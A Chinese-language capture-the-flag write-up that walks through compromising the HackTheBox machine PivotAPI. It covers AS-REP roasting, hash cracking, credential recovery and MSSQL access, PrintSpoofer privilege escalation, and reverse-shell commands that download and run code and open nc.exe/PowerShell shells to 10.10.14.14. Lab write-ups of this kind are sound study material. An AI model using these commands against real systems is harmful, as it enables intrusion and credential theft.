基本信息

端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
$ nmap -sC -sV -Pn 10.10.10.240

Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-13 10:17 CST
Nmap scan report for 10.10.10.240
Host is up (0.069s latency).
Not shown: 986 filtered ports
PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 02-19-21  03:06PM               103106 10.1.1.414.6453.pdf
| 02-19-21  03:06PM               656029 28475-linux-stack-based-buffer-overflows.pdf
| 02-19-21  12:55PM              1802642 BHUSA09-McDonald-WindowsHeap-PAPER.pdf
| 02-19-21  03:06PM              1018160 ExploitingSoftware-Ch07.pdf
| 08-08-20  01:18PM               219091 notes1.pdf
| 08-08-20  01:34PM               279445 notes2.pdf
| 08-08-20  01:41PM                  105 README.txt
|_02-19-21  03:06PM              1301120 RHUL-MA-2009-06.pdf
| ftp-syst:
|_  SYST: Windows_NT
22/tcp   open  ssh           OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey:
|   3072 fa:19:bb:8d:b6:b6:fb:97:7e:17:80:f5:df:fd:7f:d2 (RSA)
|   256 44:d0:8b:cc:0a:4e:cd:2b:de:e8:3a:6e:ae:65:dc:10 (ECDSA)
|_  256 93:bd:b6:e2:36:ce:72:45:6c:1d:46:60:dd:08:6a:44 (ED25519)
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2021-05-13 02:18:50Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: LicorDeBellota.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
1433/tcp open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-ntlm-info:
|   Target_Name: LICORDEBELLOTA
|   NetBIOS_Domain_Name: LICORDEBELLOTA
|   NetBIOS_Computer_Name: PIVOTAPI
|   DNS_Domain_Name: LicorDeBellota.htb
|   DNS_Computer_Name: PivotAPI.LicorDeBellota.htb
|   DNS_Tree_Name: LicorDeBellota.htb
|_  Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2021-05-13T02:14:57
|_Not valid after:  2051-05-13T02:14:57
|_ssl-date: 2021-05-13T02:19:40+00:00; 0s from scanner time.
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: LicorDeBellota.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Service Info: Host: PIVOTAPI; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| ms-sql-info:
|   10.10.10.240:1433:
|     Version:
|       name: Microsoft SQL Server 2019 RTM
|       number: 15.00.2000.00
|       Product: Microsoft SQL Server 2019
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| smb2-security-mode:
|   2.02:
|_    Message signing enabled and required
| smb2-time:
|   date: 2021-05-13T02:19:03
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 105.85 seconds

21 ftp

ftp匿名登录:

username

ftp里pdf文件,查看信息得到一些用户名:

1
2
3
4
saif
byron gronseth
alex
Kaorz

ASREPROAST

根据扫描结果发现是域环境,尝试根据用户名进行ASREPROAST,得到Kaorz用户的krb5asrep hash:

1
2
3
python3 ~/Tools/impacket/examples/GetNPUsers.py LicorDeBellota.htb/ -usersfile users.txt -format john  -dc-ip 10.10.10.240

$krb5asrep$Kaorz@LICORDEBELLOTA.HTB:a9391a27ab311b826fdf715429495980$8e1ae7257257c8a5c0c67fa8ed6a639f260732e4a818298ba6d125a7a88f1ffe6f8f5db78e492f29530e97cfe2598fe1bf5cf23a0864ed38b1c8cc242df4fbd62e61baa2bd1bda681741c2341405693150036560e316cab6de8e1a96fb4c3374e33e2734db8aec7ea25938fa16e3ff42f9c71bfe67d543a40f6d8145384e259b83f8c4e41aeaeb5b72035140ac9f60411cff2c3bf85603729109cd67f7ca8769f1471f30936b2eb8270785cd1ccc3eeaa6806308a22e79aff5f638ba9dbe614a954ebe82a78f907721a5ab22a30605e6cc50192b02d5fd3de076a657a8bff3f6c636e37b4bc69ca40e8e98c3d0544b42321f1cde5993e68d

hash crack

破解出来Kaorz用户密码,Roper4155:

1
2
3
4
5
6
7
8
9
10
➜  Desktop sudo john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
[sudo] password for miao:
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Roper4155        ($krb5asrep$Kaorz@LICORDEBELLOTA.HTB)
1g 0:00:00:16 DONE (2021-05-12 19:22) 0.06157g/s 657024p/s 657024c/s 657024C/s Roryarthur..Ronald8
Use the "--show" option to display all of the cracked passwords reliably
Session completed

SMB

得到的密码不能直接ssh,可以SMB:

NETLOGON

NETLOGON里Helpdesk里几个文件,下载下来分析:

exe分析

procmon之类的可以发现Restart-OracleService.exe调用cmd,CMDWatcher查看命令:

大概就是生成一个restart-service.exe,执行后删除:

restart-service.exe

所以直接修改bat内容,留下exe文件进行分析:

因为是重启服务用的,其中会有认证信息,API调用里得到oracle用户名密码格式:

1
2
svc_oracle
#oracle_s3rV1c3!2010

mssql

另外还有两个msg文件,里面说oracle是2010年的,2020年换成了mssql,前面也看到有mssql服务,所以账号密码也都参照格式得到mssql的:

1
2
sa
#mssql_s3rV1c3!2020

mssql

MDUT牛逼:

mssql shell

priv

有SeImpersonatePrivilege权限:

reverse shell

都弹不回来:

1
2
3
4
powershell "IEX (New-Object Net.WebClient).DownloadString(\"http://10.10.14.14:7777/Invoke-PowerShellTcp.ps1\");"

cmd /c powershell iwr http://10.10.14.14:7777/nc.exe -outf \windows\system32\spool\drivers\color\cute.exe
cmd /c start \windows\system32\spool\drivers\color\nc.exe 10.10.14.14 4444 -e cmd.exe

提权 & flags

因为有SeImpersonatePrivilege,可以PrintSpoofer提权:

路径不是常规的,根据Users目录和net user信息确认下就可以:

1
2
C:/Windows/System32/spool/drivers/color/PrintSpoofer.exe -i -c "powershell -c type C:\Users\3v4Si0N\Desktop\user.txt"
C:/Windows/System32/spool/drivers/color/PrintSpoofer.exe -i -c "powershell -c type C:\Users\cybervaca\Desktop\root.txt"

参考资料